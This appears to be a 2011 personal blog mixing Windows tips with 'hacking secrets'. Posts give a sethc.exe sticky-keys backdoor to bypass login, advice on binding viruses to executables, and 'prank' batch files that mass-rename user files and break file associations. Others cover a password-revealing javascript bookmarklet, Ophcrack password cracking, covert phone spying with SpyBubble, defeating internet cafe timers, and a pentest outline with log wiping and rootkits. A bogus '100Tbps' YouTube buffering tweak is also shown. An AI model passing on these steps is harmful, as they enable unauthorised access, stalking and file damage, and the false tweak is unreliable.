HAPPY NEW YEAR
Saturday, 31 December 2011
Labels:
Emotins,
Feelings and Love
Posted by
Pprasoon
at
04:08
0
comments
Stages of a Penetration Test
Friday, 30 December 2011
It for most penetration tests these are the main stages that will take place in order, each stages has a higher level of access and control over the system.
- Network Mapping: This is a more technical approach to gaining more information on the system, here you will map all live hosts on the network and on the server. Scan the ports and services. Identify the operating systems, identify firewalls, switches and routers, fingerprint services and map out what is available publically over the internet and what services are interal only.
- Vulnerability Identification: This is where we will identify vulnerable services and systems. We will do this by using the service banners we attained in the previous phase. We will also perform vulnerability scans for known vulnerabilities and check for false positives. Once we discover vulnerabilities we enumerate these further and estimate the impact and privellages gained from the vulnerability. From here we can plan our attack path and scenario.
- Penetration: This is where we will find tools, scripts and exploits that will help us gain access by exploiting the vulnerabilities in the previous stage. We can also develop our own tools and scripts to exploit these vulnerabilities. Also in this stage we will optimise and customise any scripts we have so that they will work in this scenerio, it is very common that we will have to modify exploits to work in the current scenario. Once we have all our tools we can test the proof of concept and see if they work with the vulnerabilities so we can eliminate false positives. At the end of this stage we can document our findings and the possible impact of these exploits.
- Gaining Access: Here we will attempt to gain some sort of access to the target system, starting with low privellage access such as finding blank or default passwords in system accounts, brute forcing user accounts, and finding public services with poor configurations allowing us to read and write files for example. Here we also use our tools from the previous phase to gain what access we can.
- Privellage Escallation: It is likely that we have low access on the system and cannot complete our goal yet due to incorrect privellages. In this stage we can identify local vulnerabilities that can help us get administrator or root privellages over the system such as 'root' on unix systems and 'system' on Windows systems. Here we will have to bypass the systems internal antivirus and firewall systems. We can search for known exploits based on the findings of the internal services we have found or we can attempt to write our own.
- Enumerating Further: Now we are inside the network and can see many systems that weren't accessable from the outside. Here we can obtain the stored hashes on the current system and decrypt them to see if they work on any other network systems. We can also identify all other hosts, services, firewalls, routers and switches on the network and test if they are vulnerable as done in the previous stages. We can also sniff local traffic and attempt to get more passwords to compromise other systems. Other techniques that are used in this phase are gathering important data on the local system such as cookies and browsing history to attempt password attacks on exterior web pages. We can also gather email accounts that could enable us to perform phishing attacks on other uses in the network. Also we could execute client side attacks on other network users to compromise their system with a little social engineering.
- Compromising other Users/Systems: Here we put all the information found in the previous section to use and gain as much access as we can over the network. It is common to find many vulnerabilities here as often companies don't think they need to secure the local network as they do not think anyone can access it.
- Maintaining Access: This is where you setup a permanent method of accessing the system so you don't have to exploit it every time you want to access it. Also this could give you access even after the vulnerability was patched. There are number of methods of doing this. You could setup a backdoor on the system that you can connect to and feed commands to, simillar to a system shell. This is usually done by opening up a port on the system and allowing access by a user and password, it is important the backdoor has authentication otherwise anyone could have access to the system. Rootkits can be installed these have the highest privellages on a system even higher than the system administrator. You can also setup covert channels such as http-tunnels, icmp-tunnels and vpn tunnels which allows you to send and receive data to and from the target system undetected.
- Covering Tracks: This is where you do all you can to remain undetected on the system so you can keep access for as long as possible, here you hide files used to exploit the system and that may raise suspisions. You also should clear the logs files or alter them so the attack logs are not there. You can also disable antiviruses and IDS to prevent them from finding your backdoor/rootkit.
- Reporting: This is where you write your report on your findings, you must make sure you tailor your report to the skills of who will receive it, such as the developer must have detailed information on how to patch, or if it was the manager he may not have vast IT knowledge so it must be basic details with colourful graphs and images. You must include the summary of the attack, the impact, the tools used, the services that are vulnerable, the systems compromised, the information that was gathered, screenshots, dates and times of the tests, outputs of all the scans, and the next steps to work on to fix the system.
Labels:
Computer Forensics
Posted by
Pprasoon
at
04:36
0
comments
Binders
Thursday, 29 December 2011
A binder binds two things into one :: for example say i bind a virus to a notepad.exe
so when person open it up :: it opens notepad as soon as it closes the notepad the virus behind the notepad.exe will be activated.
you can bind any virus to an exe of the software
Now how to do it
Heres' the SECRET
there are two ways to do it
one with software which is in built in window XP/vista/7
* Which is known as iexpress
Open run command (windows key + R)
type in there iexpress and press enter
** Another is software namely file joiner
and here is another software download it => Click on me
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
20:29
0
comments
Backdoor for Windows XP & 7
Thursday, 1 December 2011
I tell you this question answer in layman's language as the name suggest backdoor which means the door at the back ::
Backdoor is the way created in windows xp and 7 to get inside the computer even it is password protected account ::
Say like this i have created a hidden backdoor in your house and you have put a lock in front gate of your house so i use my backdoor to enter into your house
In the same way i will make a hidden backdoor in your window xp or 7 so that if any time there is password to the account i can easily manage to enter the account with help of backdoor
What We are Doing ?
We are just changing the sticky keys into cmd (command prompt)
When a login page comes with password protection just :: click your shift key 5 times instead of opening sticky key command prompts open ups.
*************************
MAKE BACKDOOR HELP OF BACKTRACK TERMINAL => Click on me :))
**********************************
Now how to put a backdoor in Window XP and 7
Heres' the SECRET
How to make backdoor in Window XP
Just copy the cmd.exe from C:\windows\system32
Now here is the step wise to do it *Go to C:\windows\system32
** Copy cmd.exe on your desktop and rename it to sethc.exe .
***Now copy that file and paste again in system32 directory.
Here is the Video tutorial => videos will be available after some time
Now basically what we are do is we changing/replacing sticky keys with cmd (command prompt)
so that when you open the computer and password protected login screen click five times on shift and boom command prompts opens
How to make backdoor in window 7* Go to C:\windows\system32
** Copy cmd.exe on your desktop and rename it to sethc.exe .
***Now copy that file and paste again in system32 directory.
Now will have the problem of ACCESS DENIED
now here is two ways to remove the problem of ACCESS DENIED
First method => change operating system from window 7 to windows xp.... ( haha :))
Second method is
** Again right click on sethc.exe, open properties.
*** Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.
***** Click on 'Administrators' , give it full control
****** Apply changes.
Here is video tutorial => videos will be available after some time
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
11:42
0
comments
Different ways to HIDE Drives
Wednesday, 23 November 2011
Heres' the SECRET
Features to hide drives
* 100% totally protected from VIRUS
** 100% totally protected files to be STOLEN
*** 100% totally protected that files to be FORMATTED or DELETED
**** 100% ,, MOST IMPORTANT files are safe of your company, business, or any work you do.
***** 100% files are safe if even some one breaks in to windows password
Lets hide drive different ways
First method to hide drive with help of gpedit (help of Group Policy)
Steps *** open run command (windows key + R) then type in gpedit.msc
a window will open namely Local Group Policy Editor
At the left side of the window you will see "USER CONFIGURATION " AND "COMPUTER CONFIGURATION"
At USER CONFIGURATION
Click on Administrative Templates
then click on Windows Components
then click on Windows ExplorerAt the right side of the window navigate and look for "Hide these specified drives in My Computer."
Click on it and a window will open and check on Enable and in the same window you will see
"OPTION" and you can pick option which drive you want to hide
These are the options
- Restrict A, B, C and D drives only
- Restrict A, B and C drives only
- Restrict A and B drives only
- Restrict all drives
- Restrict C drive only
- Restrict D drive only
- Do not restrict drives
To Hide all Drive (Download registry key ) => Click on me
To Hide only C Drive (Download registry key) => Click on me
To Hide only D Drive (Download registry key) => Click on me
To Hide only E Drive (Download registry key) => Click on me
To Hide only F Drive (Download registry key) => Click one me
To Enable the drives (one or all) (Download registry key) => Click on me
** These all can be done manually just open the downloaded file & read the instruction as for example
we are opening enable all the drives :: second click on the file and select Edit
() open run command type regedit and hit enter
a window will open
Navigate => [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] These commands will be seen in the left of the window
"NoDrives"=dword:0 [ This command you have to write at the right of the window]
How to write => just second in blank space at the right side of the window and select dword and type above code same as it is (without quotes) .. and restart your computer
Third way to Hide Drives help of CMD (Command Prompt)
Open you CMD (Command Prompt)
Type cd\ and press enter
Type diskpart and press enter (a window will open same as cmd namely as diskpart)
Type (in second Window) list volume and press enter Note : there is space between list & Volume
Type select volume for eg we take 4 and press enter
Type remove letter (drives name) E and press enter
And you are done
Now to get back the Drive again
Repeat the whole procedure and at the place of remove letter just type assign letter (drives name) and press enter
and exit
Here is The Video tutorial for the CMD => Click on me
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
04:48
0
comments
How to keep our COMPUTER or LAPTOP safe
Sunday, 20 November 2011
How to keep our computer or laptop safe :: aa question is big
Heres' the SECRET
To keep your Laptops and computer safe with different ways
Firstly put the password in BIOS
Put the password in BIOS
Here is the procedure
*) Open your bios with the help of pressing F2 or DEL key or F8 or ESC button every machine has different button
**) Now go to the SECURITY option
***) Select USER PASSWORD :: you will be prompt to enter a password
****) Enter eight (8) digit password which is secure and strong also
*****) It will again ask for the password or confirm password and you will be done
******) Now press F10 to save or go to save option and hit enter on YES
*******) The machine will reboot and ask for password just enter your password and every time you reboot or restart it will ask for the password at the first in BIOS
FEATURES
Why did i tell you put the password in BIOS ?
*) BIOS is some what a strong and not easy breakable also
**) The person will also be not able to reach into your computer if it uses third party attack :: with the help of backtrack or something else
***) It basically more secure and safe from other log on breaking passwords
****) Even no CD or DVD can break it.
*****) BIOS password can be also be broken but the trick does not follow or work every time
I recommend to use to put password in your BIOS
DISADVANTAGE
*) Its not breakable so if you forget you have to go your vendor to open it
**) BIOS password can be also be broken but the trick does not follow every time ( i will be posting how to break the BIOS password after few days)
Second Way to keep your LAPTOP secure
Here the SOFTWARE namely LAPTOP ALARM
Download Laptop alarm => Click on me
For more security go to this => click one me
You can also trace your laptops => http://www.ztrace.com
Blog posting will be stopped for a month ( i am heart fully sorry for saying this but i am really busy for a month)
after one month i will be coming with new ideas a new way to be safe and protected from being hacked and cracked
Yours truly
Secrets finally revealed
Pprasoon nigam a security expert
Any solution to the problem :: for example free software, hacking, cloud computing, and anything related to computer
Please send mail to fraternity.contacts@gmail.com
www.fraternityindia.com
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
09:12
0
comments
Countermeasures On OPHCRACK (Safe ur WIN 7/VISTA/XP)
Thursday, 17 November 2011
Heres' the SECRET
First here is the way how to hack the password of windows 7 => Click one me
Now how to safe yourself
Very simple thing you have to do
*) just keep your password of minimum lenght of 7
**) keep your password with combination of alphabets, numbers and ASCII Codes
***) never keep your password in series :: for example prasoon09 :: OPHCRACK HAVE ABILITY TO CRACK IT
****) keep the passwoed in jumble format :: for example pras09oon$$ :: OPHCRACK will not crack it
OPHCRACK is better software to crack or break or hack window xp or vista or 7 password but not the best ::
It also have limitation :: Few next you will be getting the best possible way to hack or crack or break password of vista or xp and even 7 that the best possible way i will give
thanks for reading
Pprasoon Nigam a security expert
http://www.fraternityindia.com/
any problem anything related to hacking, cracking, breaking, software & any thing related to computer do send mail on
kinngofhackers@gmail.com
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
18:33
0
comments
Break windows 7 password
Monday, 14 November 2011
Heres' the SECRET
The software name is OPHCRACK
Download OPHCRACK => click on me
Here is the video tutorial => Click on me
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
08:06
0
comments
Extract the Contents from .exe & .msi file
Monday, 7 November 2011
Heres' the SECRET
Download the software => Click on me
The tool is capable of extracting the contents of the archive or self executable files however it can’t create any archive file on its own. But if you only wish to have a tool to see the contents of an archive or other packages, then this is the tool to have in your system.
Extract the contents from a .msi executable setup file
Sometimes initializing the .msi installer will temporarily extract the files into C:\Documents and Settings\<username>\Local Settings\Temp, but those files are removed once the installer exits.
here are the command with steps
Step *: Open run and type cmd..
Step **: Type msiexec /a C:\yourfile.msi /qb TARGETDIR=G:\msi_test
Step ***: Now wait for a few seconds.. Then u will see a popup extracting files.
Step *****: It’s done. Now open the target directory and check out extracted files and folders.
Note: C:\yourfile.msi is the file which will be extracted. G:\msi_test is the folder location where the extracted files will be located. The destination directory does not need to exist prior to running this command.
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
08:42
0
comments
Scare your friends with Most funny Virus
Wednesday, 2 November 2011
Heres' the SECRET
Its just a funny virus and it will not harm any of your file in system just too make friend scared here the batch file
here is the code just type in notepad or copy and .save it as kinng.bat
OR
Download the file => Click on me
@echo off
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that.AB made the CODE which will delete your account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting.......
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A N00B.
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
11:13
0
comments
Add a Background Image to a Folder
Heres' the SECRET
Step *: Open notepad (windows key + R type in notepad)
Step **: Copy and paste the following line in your notepad.
[ExtshellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=C:\background.jpg
Note: C:\Background.jpg will be shown as your background image. You can Change it to your current background image path. The picture must fit your screen resolution. (its an example) can use any picture
Step ***: Now save the file as “desktop.ini".
Step ****: Now copy-paste the file to any folder where you want to show the background picture.
Step ***** : wooolllllaaaaa done..!! Refresh to see the changes.
The most easiest way to use a software
download the software => Click on me
Works in Windows XP perfectly...
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
11:00
0
comments
Google Images Bulk Image Downloader
Heres' the SECERT
Working
*. Download the software => Click on me
**. After download it extract it and RUN the application.
***. You will see something like below interface .:
****. Now go to the Google Images and search images which you wanna download in BULK.
*****. After searching copy the link and click on Get URL like in the above image and it will grab your copied URL, now click on Get Image Links and after it has grabbed all the links choose a folder where you wanna save the images and then click on Download.
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
10:15
1 comments
Windows Registry Tricks
Saturday, 29 October 2011
Heres' the SECRET
Here are some of Windows Registry Tricks which you can tryout :
open registry edit by pressing windows key +R type in regedit hit enter
1. Disable the Autorun Option in your CD Rom Drive:
Open your Registry and navigate to "HK_L_M\system\currentcontrolset\services\cdro m"
Change the value of 'Autorun', or create a new DWORD value if it doesn't already exist, and set the value as '0' for Autorun disabled.
2. Disable the Harddisk Lowdiskspace warning in Windows Xp
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
create a new DWORD 'NoLowDiskSpaceChecks' and change its value to '1'.
3. Disable the Windows Key
"HK_L_M\system\currentcontrolset\control\keybo ard layout"
Create a new Binary value, or modify the existing value called 'Scancode Map' as shown below.
Value: 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00
4. View System BIOS Information
Open Registry and navigate to
"HK_L_M\hardware\description\system"
5. Change the Title of WindowsMedia Player
"HK_C_USER\software\policies\microsoft\windows medi aplayer\"
Create a new string value called ' TitleBar' and change text as your wish.
6. Disable Internet access in Network
Open Registry and make the following changes
"KH_C_User\software\microsoft\windows\currentv ersi on\internetsettings\"
Change the value of "Proxyenabled" to 1 and change the value of "proxyserver" and set it to an ip address. Change the value of the ip address and port to "10.0.0.1:5555"
7. Disable the ability to Right click on the desktop
"HK_C_User\software\microsoft\windows\currentv ersi on\policies\explorer\"
Create a DWORD "NoViewContextMenu" and change its value to "0" for disabling and "1" for enabling.
8. Hide all items on desktop
"HK_C_USER\software\microsoft\windows\currentv ersi on\policies\explorer\"
and
"HK_L_M\software\microsoft\windows\currentvers ion\ policies\explorer\"
create a new DWORD "NoDesktop" and change its value to "1"
You can show all the items in the desktop by chaning the value to "0"
9. Disable the "Change Password" button in windows
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\System"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersi on\Policies\System"
Create a new DWORD "DisableChangePassword" and change its value to "0" for disabling and "1" for enabling.
10. Disable the "cancel" button or pressing the "Esc" key while logging on to Windows"
"HKEY_USERS\.DEFAULT\Software\Microsoft\Window s\Cu rrentVersion\Run"
Create a new string value "NoLogon" and change its value to "RUNDLL32 shell32,SHExitWindowsEx 0"
11. Remove "Log off" from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoLogOff" and change its value to "1" for disabling and "0" for enabling.
12. Clear the Recent playlist in Media Player
Navigate to "HKEY_CURRENT_USER\Software\Microsoft\MediaPla yer\ Player"
And clear the "RecentFileList" subkey.
13. Empty temporary Internet files on exit (in Internet Explorer)
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Internet Settings\Cache"
and
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur rentVersion\Internet Settings\Cache"
Create a new DWORD "Persistent" and change the value to "0" for emptying and "1" to remove this option.
14. Clear the Internet Explorere typed addresses history
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs"
And delete the subkeys.
15. Remove recent documents from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoRecentDocsMenu" and change its value to "1".
16. Remove Network connections from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoNetworkConnections" and change its value to "1".
17. Remove My documents from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoSMMyDocs" and change its value to "1".
18. Remove My pictures from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer "
Create a new DWORD "NoSMMyPictures" ad change its value to "1".
19. Remove My music fro start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoStartMenuMyMusic" and change its value to "1".
20. Reboot windows after crash
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\C ontr ol\CrashControl"
Create a new DWORD "AutoReboot" and change its value to "1".Restart the machine for the effect to take place.
21. Disable the use of MSDos
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\WinOldApp"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\WinOldApp"
Create a new DWORD "Disabled" and set its value to "1". Change it to "0" for enabling.
22. Enable Directory completion in MSDos prompt
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Command Processor
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor"
Create a new DWORD "PathCompletionChar " and set it to equal the hex value of the required control character.
23. Quick edit the command prompt
User Key: "HKEY_CURRENT_USER\Console"
and
System Key: "HKEY_USERS\.DEFAULT\Console"
Create a new DWORD "QuickEdit" and set its value to "1" for enabling and "0" for disabling.
24. Disable Registry editing
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\ Curr entVersion\Policies\System"
Create a new DWORD "DisableRegistryTools" and change its value to "0" for allowing Regeditand "1" for disabling it.
25. Disable task scheduler
" HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices"
Delete the value from "SchedulingAgent". Usually its value is set to "'mstask.exe".
26. Remove My computer from desktop and start menu
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\NonEnum"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\NonEnum"
Create "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" and change its value to "1" for removing. Change its value to "0" for showing.
27. Show Windows version on desktop
User Key: "HKEY_CURRENT_USER\Control Panel\Desktop"
Create a new DWORD " PaintDesktopVersion" and change its value to "1" for showing and "0" for removing.
28. Remove My documenst from desktop
Windows 95, 98 and Me
"HKEY_CURRENT_USER\Software\Classes\CLSID\{450 D8FB A-AD25-11D0-98A8-0800361B1103}\ShellFolder"
Windows NT, 2000 and XP
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder"
Modify the value called "Attributes" as "0xf0500174" to hide or "0xf0400174" to show.
29. Disable Scan disk after improper shutdown
" HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\FileSystem"
create a new DWORD "DisableScandiskOnBoot" and change its value to "01" for disablng and "00" for enabling.
30. Automatically end Hung programs.
" HKEY_CURRENT_USER\Control Panel\Desktop"
and
System Key: [HKEY_USERS\.DEFAULT\Control Panel\Desktop"
Modify the value of "AutoEndTasks" to "1".
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
10:29
1 comments
DIWALI BOOM
Thursday, 27 October 2011
(Funny virus)
Heres' The SECRET
*.* open notepad (window key + R typin notepad)
Copy paste the following code and save as prasoon .bat
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Download the batch file => Click on me
Here is the another MAGIC
Copy paste the following code and save as prasoon .bat
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System is cracked …..
exit
Download the batch file => Click on me
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
21:39
0
comments
How To Spy A Mobile Phone
Only For Educational purposes:
Heres' the SECRET
SpyBubble is a software that allows you to log in from any computer and access any smartphone that it is installed on. Through SpyBubble, you can monitor and supervise any smartphone simply by entering your login username and password.
How To Download And Install SpyBubble On A Smartphone:
Step *. Open the Web Browser on your target phone and type in the following address and press Enter.
http://www.spybubble.com/symbian/sbubble.sis
TO download spybubble => Click on me
Step **. After SpyBubble has been installed, Switch the phone off and then on.
Step ***. Register your license key as shown below.
To get you license key, go to: SpyBubble Setting Page (you may have to log into the system first) You can also go to the member control panel and click on the Configuration menu to get it.
Step ****: Log in to http://www.SpyBubble.com/. Login Panel to verify if your account is working flawlessly.
Features :
*Has GPS tracking.
**Can spy on text messages.
***Can get contact book info from phone.
****Can check out call log.
*****Popular Smart Phones supported.
******Can be used to back up your own phone’s information.
*******100% undetectable.
Labels:
Hacking Secrets Finally Revealed
Posted by
Pprasoon
at
21:14
0
comments
Javscripts tricks
Heres' the SECRET
Just copy paste the java script in to the address bar and hit enter and see the MAGIC
*.* Edit any webpage.. just copy paste the javascript in to the address bar and hit enter and see the MAGIC
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
*.* Dancing Images
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
*.* Play Game
javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);
*.* Infinite Alert Boxes
javascript:while(1){alert('Restart your brower to close this box!')}
*.* Calculator
javascript: alert(4+5+6+7+(3*10));
.*.* View Passwords Behind Asterisk
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
*.* Fly Code
javascript: for (var int = 0; int < 600; int++) { var rand = Math.floor(Math.random()*600); window.scroll(0, rand); } void(0);
*.* Hate Code
This will make your page display a popup that cannot be removed unless you click the ok button (only available button) 500 times.
You can change the 500 below to whatever you wish, you may also change the left! in quotations to whatever message you want. There is a custom one below as an example.
Code:
javascript: var t = 500; for (var int = 0; int < t; int++) { var l = t – int; alert(l +’ left!’); } void(0);
Image:
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
10:48
0
comments
Disable The Internet Cafe's Timer
Heres' the SECRET
Manual Way to do it
Go to the registry editor (open cmd type regedit and hit enter ), than navigate to
"HKEY_CURRENT_USER>Appevents>software>classes>Microsoft>windows>current version>internet settings>policies>system"
than on the right pane where it says Disable Task manager, right click on it, and scroll down to modify, and than change the value of it to "0", and than open Windows Task Manager By Holding Down These Keys, "CTRL+ALT+DEL/DELETE" And Than Disable The Internet Cafe's Timer,
Software that helps you to Kill time of cyber cafe
SoftwareS click and download (free download)
*.* I_Want_To_Play_Free_v2 => to download Click on me
*.* net time client server_zip => to download Click on me
*.* Process Suspender (the best)=> to download Click on me
UNLIMTED TIME.Enjoy it..!!!
Labels:
Hacking Secrets Finally Revealed
Posted by
Pprasoon
at
10:32
0
comments
Trick To SEND free sms from FACEBOOK
Wednesday, 26 October 2011
Heres' The SECRET
If your 100sms is over for one day and you want to send more sms to your friends
- First login to facebook.com
- Second goto this link Click on me
- and select any free website from which you want to send free sms
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
21:01
0
comments
How To Send Email on Later Date
Heres' the SECRET
Go to the website www.lettermelater.com
STEPS
* Click on Sign up For Free button and fill your information.
** Now verify your account by visiting your Email Address that you had given in the Sign up process.
*** Now click on the Compose button to send a new Email.
**** In the From Field you will see your Email Address from which you are sending an Email, in To Field give recipient’s email address
***** Click on the Calendar button to set date and time when you want to send your Email and attach a file if any.
****** Click on Schedule to be Sent now your Email will be sent on your scheduled date.
This works in all browsers and this will not affect your account privacy.
Features Of LetterMeLater
* File attachments!
* Send emails later from your own email program!
* Create HTML emails! Use rich content to add style and structure.
* Send emails from any of your email addresses.
* Send recurring emails.
* Your email will be the return address on the emails you send.
* Import your contacts and create group mailing lists.
* Send emails with carbon copies (cc) and blind carbon copies (bcc).
* The time of day to send is specified in your local time.
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
20:48
0
comments
HAPPY DIWALI
Tuesday, 25 October 2011
Labels:
Emotins,
Feelings and Love
Posted by
Pprasoon
at
20:46
0
comments
Increase Youtube video buffering speed
Heres' the SECRET
Start => Run (windows key + R) => system.ini => Hit Enter
A notepad will open which contain the following code-
Code:
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Copy the below text and paste it there-
Code:
page buffer=100Tbps
load=100Tbps
download=100Tbps
save=100Tbps
back=100Tbps
search=100Tbps
sound=100Tbps
webcam=100Tbps
voice=100Tbps
faxmodemfast=100Tbps
update=100Tbps
Save it and enjoy!!!
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
11:11
0
comments
Paste blank status on Facebook
Heres' the SECRET
Paste: @[0:0: ].........(note:- the text is like @[0:0:space],don't write
space rather press spacebar where i have write space )
For MultiLine Blank Status :
Paste: Like I have shown below
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
Method **
Steps:
1:Go to Facebook status
2:Type @[2:2: ]
3: post it.
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
10:26
0
comments
Recover deleted SMS Messages
Heres' the SECRET
Hence read them right on your phone.
Things you will need .:
* A Nokia Mobile supporting application download.
**. Second search for any File-Manager like ( FExplorer, Fileman or any other )
fexplorer => to download Click on me
***. Install that application on your cellphone.
****. Now when everything is ready follow the below steps .:
Procedure to Read Deleted SMS in Mobile .:
*. Open your File-Manager i.e.. FExplorer or Fileman
**. Select the memory card drive that can be C: or D: just check it out.
***. Now after opening drive navigate to System > Mail
****Now in Mail folder you will see different folders like ( 0010001_s )
*****. Now the above folders are the actual messages which you are going to read, now there will be many folders which are actually all the messages now search for the one you are browsing and than do not open that directly as it will not be supported, choose the one you wanna open than choose open > file > hex/text viewer.
******. That’s it now you are reading the deleted SMS which you can copy or transfer into other phone by sending it through Bluetooth.
Labels:
Hacking Secrets Finally Revealed
Posted by
Pprasoon
at
09:41
0
comments
Mozilla Firefox and Internet Explorer Keyboard shortcuts
Heres' the SECRET
Keyboard Shortcuts:
Alt + Left Arrow key : To go to back page
Alt + Right Arrow key : To go to next page
Alt + Home key : To go to Home page.
Ctrl + + : To increase font size.
Ctrl + - : To decrease font size
Ctrl + 0 : To Default font size
Ctrl + F : To search any text
Ctrl + G or F3 : To search again last searched
Ctrl + T : To create new tab
Ctrl + N : To create new window
Ctrl + Tab key : To select next tab
Ctrl + W : To close tab.
Ctrl + Shit + T : To restore recently closed tab.
Ctrl + Shift + W : To close window.
Ctrl + F4 : To close tab.
Alt + F4 : To close window
Ctrl + Shift T : Open recently closed tab.
Ctrl + R : Reload
Ctrl + U : To view page source file
Ctrl + Tab key : To select next tab
